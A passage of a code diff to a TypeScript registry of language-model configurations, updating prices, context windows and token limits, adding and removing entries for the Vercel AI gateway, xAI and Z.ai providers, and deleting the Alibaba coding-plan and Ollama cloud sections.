 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -11766,8 +11918,8 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.04,
-				output: 0.04,
+				input: 0.09999999999999999,
+				output: 0.09999999999999999,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -11783,8 +11935,8 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.09999999999999999,
-				output: 0.09999999999999999,
+				input: 0.15,
+				output: 0.15,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
@@ -11868,14 +12020,31 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 0.5,
-				output: 2,
-				cacheRead: 0,
+				input: 0.6,
+				output: 2.5,
+				cacheRead: 0.15,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
 			maxTokens: 16384,
 		} satisfies Model<"anthropic-messages">,
+		"moonshotai/kimi-k2-0905": {
+			id: "moonshotai/kimi-k2-0905",
+			name: "Kimi K2 0905",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: false,
+			input: ["text"],
+			cost: {
+				input: 0.6,
+				output: 2.5,
+				cacheRead: 0.15,
+				cacheWrite: 0,
+			},
+			contextWindow: 256000,
+			maxTokens: 16384,
+		} satisfies Model<"anthropic-messages">,
 		"moonshotai/kimi-k2-thinking": {
 			id: "moonshotai/kimi-k2-thinking",
 			name: "Kimi K2 Thinking",
@@ -11885,13 +12054,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.47,
-				output: 2,
-				cacheRead: 0.14100000000000001,
+				input: 0.6,
+				output: 2.5,
+				cacheRead: 0.15,
 				cacheWrite: 0,
 			},
-			contextWindow: 216144,
-			maxTokens: 216144,
+			contextWindow: 262114,
+			maxTokens: 262114,
 		} satisfies Model<"anthropic-messages">,
 		"moonshotai/kimi-k2-thinking-turbo": {
 			id: "moonshotai/kimi-k2-thinking-turbo",
@@ -11919,9 +12088,9 @@ export const MODELS = {
 			reasoning: false,
 			input: ["text"],
 			cost: {
-				input: 2.4,
-				output: 10,
-				cacheRead: 0,
+				input: 1.15,
+				output: 8,
+				cacheRead: 0.15,
 				cacheWrite: 0,
 			},
 			contextWindow: 256000,
@@ -11936,13 +12105,13 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text", "image"],
 			cost: {
-				input: 0.5,
-				output: 2.8,
-				cacheRead: 0,
+				input: 0.6,
+				output: 3,
+				cacheRead: 0.09999999999999999,
 				cacheWrite: 0,
 			},
-			contextWindow: 256000,
-			maxTokens: 256000,
+			contextWindow: 262114,
+			maxTokens: 262114,
 		} satisfies Model<"anthropic-messages">,
 		"nvidia/nemotron-nano-12b-v2-vl": {
 			id: "nvidia/nemotron-nano-12b-v2-vl",
@@ -11970,31 +12139,14 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.04,
-				output: 0.16,
+				input: 0.06,
+				output: 0.22999999999999998,
 				cacheRead: 0,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
 			maxTokens: 131072,
 		} satisfies Model<"anthropic-messages">,
-		"openai/codex-mini": {
-			id: "openai/codex-mini",
-			name: "Codex Mini",
-			api: "anthropic-messages",
-			provider: "vercel-ai-gateway",
-			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 1.5,
-				output: 6,
-				cacheRead: 0.375,
-				cacheWrite: 0,
-			},
-			contextWindow: 200000,
-			maxTokens: 100000,
-		} satisfies Model<"anthropic-messages">,
 		"openai/gpt-4-turbo": {
 			id: "openai/gpt-4-turbo",
 			name: "GPT-4 Turbo",
@@ -12057,7 +12209,7 @@ export const MODELS = {
 			cost: {
 				input: 0.09999999999999999,
 				output: 0.39999999999999997,
-				cacheRead: 0.03,
+				cacheRead: 0.024999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 1047576,
@@ -12108,7 +12260,7 @@ export const MODELS = {
 			cost: {
 				input: 1.25,
 				output: 10,
-				cacheRead: 0.13,
+				cacheRead: 0.125,
 				cacheWrite: 0,
 			},
 			contextWindow: 400000,
@@ -12138,11 +12290,11 @@ export const MODELS = {
 			provider: "vercel-ai-gateway",
 			baseUrl: "https://ai-gateway.vercel.sh",
 			reasoning: true,
-			input: ["text", "image"],
+			input: ["text"],
 			cost: {
 				input: 1.25,
 				output: 10,
-				cacheRead: 0.13,
+				cacheRead: 0.125,
 				cacheWrite: 0,
 			},
 			contextWindow: 400000,
@@ -12159,7 +12311,7 @@ export const MODELS = {
 			cost: {
 				input: 0.25,
 				output: 2,
-				cacheRead: 0.03,
+				cacheRead: 0.024999999999999998,
 				cacheWrite: 0,
 			},
 			contextWindow: 400000,
@@ -12176,7 +12328,7 @@ export const MODELS = {
 			cost: {
 				input: 0.049999999999999996,
 				output: 0.39999999999999997,
-				cacheRead: 0.01,
+				cacheRead: 0.005,
 				cacheWrite: 0,
 			},
 			contextWindow: 400000,
@@ -12210,7 +12362,7 @@ export const MODELS = {
 			cost: {
 				input: 1.25,
 				output: 10,
-				cacheRead: 0.13,
+				cacheRead: 0.125,
 				cacheWrite: 0,
 			},
 			contextWindow: 400000,
@@ -12261,7 +12413,7 @@ export const MODELS = {
 			cost: {
 				input: 1.25,
 				output: 10,
-				cacheRead: 0.13,
+				cacheRead: 0.125,
 				cacheWrite: 0,
 			},
 			contextWindow: 128000,
@@ -12278,7 +12430,7 @@ export const MODELS = {
 			cost: {
 				input: 1.25,
 				output: 10,
-				cacheRead: 0.13,
+				cacheRead: 0.125,
 				cacheWrite: 0,
 			},
 			contextWindow: 400000,
@@ -12295,7 +12447,7 @@ export const MODELS = {
 			cost: {
 				input: 1.75,
 				output: 14,
-				cacheRead: 0.18,
+				cacheRead: 0.175,
 				cacheWrite: 0,
 			},
 			contextWindow: 400000,
@@ -12400,7 +12552,41 @@ export const MODELS = {
 				cacheRead: 0.25,
 				cacheWrite: 0,
 			},
-			contextWindow: 200000,
+			contextWindow: 1050000,
+			maxTokens: 128000,
+		} satisfies Model<"anthropic-messages">,
+		"openai/gpt-5.4-mini": {
+			id: "openai/gpt-5.4-mini",
+			name: "GPT 5.4 Mini",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.75,
+				output: 4.5,
+				cacheRead: 0.075,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
+			maxTokens: 128000,
+		} satisfies Model<"anthropic-messages">,
+		"openai/gpt-5.4-nano": {
+			id: "openai/gpt-5.4-nano",
+			name: "GPT 5.4 Nano",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 0.19999999999999998,
+				output: 1.25,
+				cacheRead: 0.02,
+				cacheWrite: 0,
+			},
+			contextWindow: 400000,
 			maxTokens: 128000,
 		} satisfies Model<"anthropic-messages">,
 		"openai/gpt-5.4-pro": {
@@ -12420,23 +12606,6 @@ export const MODELS = {
 			contextWindow: 1050000,
 			maxTokens: 128000,
 		} satisfies Model<"anthropic-messages">,
-		"openai/gpt-oss-120b": {
-			id: "openai/gpt-oss-120b",
-			name: "gpt-oss-120b",
-			api: "anthropic-messages",
-			provider: "vercel-ai-gateway",
-			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0.09999999999999999,
-				output: 0.5,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
-			maxTokens: 131072,
-		} satisfies Model<"anthropic-messages">,
 		"openai/gpt-oss-20b": {
 			id: "openai/gpt-oss-20b",
 			name: "gpt-oss-20b",
@@ -12624,40 +12793,6 @@ export const MODELS = {
 			contextWindow: 131072,
 			maxTokens: 131072,
 		} satisfies Model<"anthropic-messages">,
-		"vercel/v0-1.0-md": {
-			id: "vercel/v0-1.0-md",
-			name: "v0-1.0-md",
-			api: "anthropic-messages",
-			provider: "vercel-ai-gateway",
-			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 128000,
-			maxTokens: 32000,
-		} satisfies Model<"anthropic-messages">,
-		"vercel/v0-1.5-md": {
-			id: "vercel/v0-1.5-md",
-			name: "v0-1.5-md",
-			api: "anthropic-messages",
-			provider: "vercel-ai-gateway",
-			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 3,
-				output: 15,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 128000,
-			maxTokens: 32768,
-		} satisfies Model<"anthropic-messages">,
 		"xai/grok-2-vision": {
 			id: "xai/grok-2-vision",
 			name: "Grok 2 Vision",
@@ -12686,7 +12821,7 @@ export const MODELS = {
 			cost: {
 				input: 3,
 				output: 15,
-				cacheRead: 0,
+				cacheRead: 0.75,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -12703,7 +12838,7 @@ export const MODELS = {
 			cost: {
 				input: 5,
 				output: 25,
-				cacheRead: 0,
+				cacheRead: 1.25,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -12720,7 +12855,7 @@ export const MODELS = {
 			cost: {
 				input: 0.3,
 				output: 0.5,
-				cacheRead: 0,
+				cacheRead: 0.075,
 				cacheWrite: 0,
 			},
 			contextWindow: 131072,
@@ -12754,7 +12889,7 @@ export const MODELS = {
 			cost: {
 				input: 3,
 				output: 15,
-				cacheRead: 0,
+				cacheRead: 0.75,
 				cacheWrite: 0,
 			},
 			contextWindow: 256000,
@@ -12828,6 +12963,57 @@ export const MODELS = {
 			contextWindow: 2000000,
 			maxTokens: 30000,
 		} satisfies Model<"anthropic-messages">,
+		"xai/grok-4.20-multi-agent-beta": {
+			id: "xai/grok-4.20-multi-agent-beta",
+			name: "Grok 4.20 Multi Agent Beta",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 2,
+				output: 6,
+				cacheRead: 0.19999999999999998,
+				cacheWrite: 0,
+			},
+			contextWindow: 2000000,
+			maxTokens: 2000000,
+		} satisfies Model<"anthropic-messages">,
+		"xai/grok-4.20-non-reasoning-beta": {
+			id: "xai/grok-4.20-non-reasoning-beta",
+			name: "Grok 4.20 Beta Non-Reasoning",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: false,
+			input: ["text", "image"],
+			cost: {
+				input: 2,
+				output: 6,
+				cacheRead: 0.19999999999999998,
+				cacheWrite: 0,
+			},
+			contextWindow: 2000000,
+			maxTokens: 2000000,
+		} satisfies Model<"anthropic-messages">,
+		"xai/grok-4.20-reasoning-beta": {
+			id: "xai/grok-4.20-reasoning-beta",
+			name: "Grok 4.20 Beta Reasoning",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 2,
+				output: 6,
+				cacheRead: 0.19999999999999998,
+				cacheWrite: 0,
+			},
+			contextWindow: 2000000,
+			maxTokens: 2000000,
+		} satisfies Model<"anthropic-messages">,
 		"xai/grok-code-fast-1": {
 			id: "xai/grok-code-fast-1",
 			name: "Grok Code Fast 1",
@@ -12854,14 +13040,31 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.09,
-				output: 0.29,
-				cacheRead: 0,
+				input: 0.09999999999999999,
+				output: 0.3,
+				cacheRead: 0.02,
 				cacheWrite: 0,
 			},
 			contextWindow: 262144,
 			maxTokens: 32000,
 		} satisfies Model<"anthropic-messages">,
+		"xiaomi/mimo-v2-pro": {
+			id: "xiaomi/mimo-v2-pro",
+			name: "MiMo V2 Pro",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 1,
+				output: 3,
+				cacheRead: 0.19999999999999998,
+				cacheWrite: 0,
+			},
+			contextWindow: 1000000,
+			maxTokens: 128000,
+		} satisfies Model<"anthropic-messages">,
 		"zai/glm-4.5": {
 			id: "zai/glm-4.5",
 			name: "GLM-4.5",
@@ -12873,11 +13076,11 @@ export const MODELS = {
 			cost: {
 				input: 0.6,
 				output: 2.2,
-				cacheRead: 0,
+				cacheRead: 0.11,
 				cacheWrite: 0,
 			},
-			contextWindow: 131072,
-			maxTokens: 131072,
+			contextWindow: 128000,
+			maxTokens: 96000,
 		} satisfies Model<"anthropic-messages">,
 		"zai/glm-4.5-air": {
 			id: "zai/glm-4.5-air",
@@ -12902,16 +13105,16 @@ export const MODELS = {
 			api: "anthropic-messages",
 			provider: "vercel-ai-gateway",
 			baseUrl: "https://ai-gateway.vercel.sh",
-			reasoning: true,
+			reasoning: false,
 			input: ["text", "image"],
 			cost: {
 				input: 0.6,
 				output: 1.7999999999999998,
-				cacheRead: 0,
+				cacheRead: 0.11,
 				cacheWrite: 0,
 			},
-			contextWindow: 65536,
-			maxTokens: 16384,
+			contextWindow: 66000,
+			maxTokens: 16000,
 		} satisfies Model<"anthropic-messages">,
 		"zai/glm-4.6": {
 			id: "zai/glm-4.6",
@@ -12922,8 +13125,8 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.44999999999999996,
-				output: 1.7999999999999998,
+				input: 0.6,
+				output: 2.2,
 				cacheRead: 0.11,
 				cacheWrite: 0,
 			},
@@ -12973,14 +13176,31 @@ export const MODELS = {
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0.43,
-				output: 1.75,
-				cacheRead: 0.08,
+				input: 0.6,
+				output: 2.2,
+				cacheRead: 0,
 				cacheWrite: 0,
 			},
-			contextWindow: 202752,
+			contextWindow: 200000,
 			maxTokens: 120000,
 		} satisfies Model<"anthropic-messages">,
+		"zai/glm-4.7-flash": {
+			id: "zai/glm-4.7-flash",
+			name: "GLM 4.7 Flash",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 0.07,
+				output: 0.39999999999999997,
+				cacheRead: 0,
+				cacheWrite: 0,
+			},
+			contextWindow: 200000,
+			maxTokens: 131000,
+		} satisfies Model<"anthropic-messages">,
 		"zai/glm-4.7-flashx": {
 			id: "zai/glm-4.7-flashx",
 			name: "GLM 4.7 FlashX",
@@ -13000,7 +13220,7 @@ export const MODELS = {
 		} satisfies Model<"anthropic-messages">,
 		"zai/glm-5": {
 			id: "zai/glm-5",
-			name: "GLM-5",
+			name: "GLM 5",
 			api: "anthropic-messages",
 			provider: "vercel-ai-gateway",
 			baseUrl: "https://ai-gateway.vercel.sh",
@@ -13013,7 +13233,24 @@ export const MODELS = {
 				cacheWrite: 0,
 			},
 			contextWindow: 202800,
-			maxTokens: 131072,
+			maxTokens: 131100,
+		} satisfies Model<"anthropic-messages">,
+		"zai/glm-5-turbo": {
+			id: "zai/glm-5-turbo",
+			name: "GLM 5 Turbo",
+			api: "anthropic-messages",
+			provider: "vercel-ai-gateway",
+			baseUrl: "https://ai-gateway.vercel.sh",
+			reasoning: true,
+			input: ["text"],
+			cost: {
+				input: 1.2,
+				output: 4,
+				cacheRead: 0.24,
+				cacheWrite: 0,
+			},
+			contextWindow: 202800,
+			maxTokens: 131100,
 		} satisfies Model<"anthropic-messages">,
 	},
 	"xai": {
@@ -13340,6 +13577,40 @@ export const MODELS = {
 			contextWindow: 2000000,
 			maxTokens: 30000,
 		} satisfies Model<"openai-completions">,
+		"grok-4.20-0309-non-reasoning": {
+			id: "grok-4.20-0309-non-reasoning",
+			name: "Grok 4.20 (Non-Reasoning)",
+			api: "openai-completions",
+			provider: "xai",
+			baseUrl: "https://api.x.ai/v1",
+			reasoning: false,
+			input: ["text", "image"],
+			cost: {
+				input: 2,
+				output: 6,
+				cacheRead: 0.2,
+				cacheWrite: 0,
+			},
+			contextWindow: 2000000,
+			maxTokens: 30000,
+		} satisfies Model<"openai-completions">,
+		"grok-4.20-0309-reasoning": {
+			id: "grok-4.20-0309-reasoning",
+			name: "Grok 4.20 (Reasoning)",
+			api: "openai-completions",
+			provider: "xai",
+			baseUrl: "https://api.x.ai/v1",
+			reasoning: true,
+			input: ["text", "image"],
+			cost: {
+				input: 2,
+				output: 6,
+				cacheRead: 0.2,
+				cacheWrite: 0,
+			},
+			contextWindow: 2000000,
+			maxTokens: 30000,
+		} satisfies Model<"openai-completions">,
 		"grok-beta": {
 			id: "grok-beta",
 			name: "Grok Beta",
@@ -13555,747 +13826,23 @@ export const MODELS = {
 			contextWindow: 204800,
 			maxTokens: 131072,
 		} satisfies Model<"openai-completions">,
-	},
-	"alibaba-coding-plan": {
-		"qwen3.5-plus": {
-			id: "qwen3.5-plus",
-			name: "Qwen3.5 Plus",
+		"glm-5-turbo": {
+			id: "glm-5-turbo",
+			name: "GLM-5-Turbo",
 			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
+			provider: "zai",
+			baseUrl: "https://api.z.ai/api/coding/paas/v4",
+			compat: {"supportsDeveloperRole":false,"thinkingFormat":"zai"},
 			reasoning: true,
 			input: ["text"],
 			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
+				input: 1.2,
+				output: 4,
+				cacheRead: 0.24,
 				cacheWrite: 0,
 			},
-			contextWindow: 983616,
-			maxTokens: 65536,
-			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
-		} satisfies Model<"openai-completions">,
-		"qwen3-max-2026-01-23": {
-			id: "qwen3-max-2026-01-23",
-			name: "Qwen3 Max 2026-01-23",
-			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 258048,
-			maxTokens: 32768,
-			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
-		} satisfies Model<"openai-completions">,
-		"qwen3-coder-next": {
-			id: "qwen3-coder-next",
-			name: "Qwen3 Coder Next",
-			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 204800,
-			maxTokens: 65536,
-			compat: { supportsDeveloperRole: false },
-		} satisfies Model<"openai-completions">,
-		"qwen3-coder-plus": {
-			id: "qwen3-coder-plus",
-			name: "Qwen3 Coder Plus",
-			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 997952,
-			maxTokens: 65536,
-			compat: { supportsDeveloperRole: false },
-		} satisfies Model<"openai-completions">,
-		"MiniMax-M2.5": {
-			id: "MiniMax-M2.5",
-			name: "MiniMax M2.5",
-			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 196608,
-			maxTokens: 65536,
-			compat: { supportsStore: false, supportsDeveloperRole: false, supportsReasoningEffort: true, maxTokensField: "max_tokens" },
-		} satisfies Model<"openai-completions">,
-		"glm-5": {
-			id: "glm-5",
-			name: "GLM-5",
-			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 202752,
-			maxTokens: 16384,
-			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
-		} satisfies Model<"openai-completions">,
-		"glm-4.7": {
-			id: "glm-4.7",
-			name: "GLM-4.7",
-			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 169984,
-			maxTokens: 16384,
-			compat: { thinkingFormat: "qwen", supportsDeveloperRole: false },
-		} satisfies Model<"openai-completions">,
-		"kimi-k2.5": {
-			id: "kimi-k2.5",
-			name: "Kimi K2.5",
-			api: "openai-completions",
-			provider: "alibaba-coding-plan",
-			baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1",
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 258048,
-			maxTokens: 32768,
-			compat: { thinkingFormat: "zai", supportsDeveloperRole: false },
-		} satisfies Model<"openai-completions">,
-	},
-	"ollama-cloud": {
-		"cogito-2.1:671b": {
-			id: "cogito-2.1:671b",
-			name: "Cogito 2.1 671B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 163840,
-			maxTokens: 32000,
-		} satisfies Model<"openai-completions">,
-		"deepseek-v3.1:671b": {
-			id: "deepseek-v3.1:671b",
-			name: "DeepSeek V3.1 671B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 163840,
-			maxTokens: 163840,
-		} satisfies Model<"openai-completions">,
-		"deepseek-v3.2": {
-			id: "deepseek-v3.2",
-			name: "DeepSeek V3.2",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 163840,
-			maxTokens: 65536,
-		} satisfies Model<"openai-completions">,
-		"devstral-2:123b": {
-			id: "devstral-2:123b",
-			name: "Devstral 2 123B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 262144,
-		} satisfies Model<"openai-completions">,
-		"devstral-small-2:24b": {
-			id: "devstral-small-2:24b",
-			name: "Devstral Small 2 24B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 262144,
-		} satisfies Model<"openai-completions">,
-		"gemini-3-flash-preview": {
-			id: "gemini-3-flash-preview",
-			name: "Gemini 3 Flash Preview",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 1048576,
-			maxTokens: 65536,
-		} satisfies Model<"openai-completions">,
-		"gemma3:12b": {
-			id: "gemma3:12b",
-			name: "Gemma 3 12B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
+			contextWindow: 200000,
 			maxTokens: 131072,
 		} satisfies Model<"openai-completions">,
-		"gemma3:27b": {
-			id: "gemma3:27b",
-			name: "Gemma 3 27B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"gemma3:4b": {
-			id: "gemma3:4b",
-			name: "Gemma 3 4B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"glm-4.6": {
-			id: "glm-4.6",
-			name: "GLM 4.6",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 202752,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"glm-4.7": {
-			id: "glm-4.7",
-			name: "GLM 4.7",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 202752,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"glm-5": {
-			id: "glm-5",
-			name: "GLM 5",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 202752,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"gpt-oss:120b": {
-			id: "gpt-oss:120b",
-			name: "GPT-OSS 120B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
-			maxTokens: 32768,
-		} satisfies Model<"openai-completions">,
-		"gpt-oss:20b": {
-			id: "gpt-oss:20b",
-			name: "GPT-OSS 20B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 131072,
-			maxTokens: 32768,
-		} satisfies Model<"openai-completions">,
-		"kimi-k2:1t": {
-			id: "kimi-k2:1t",
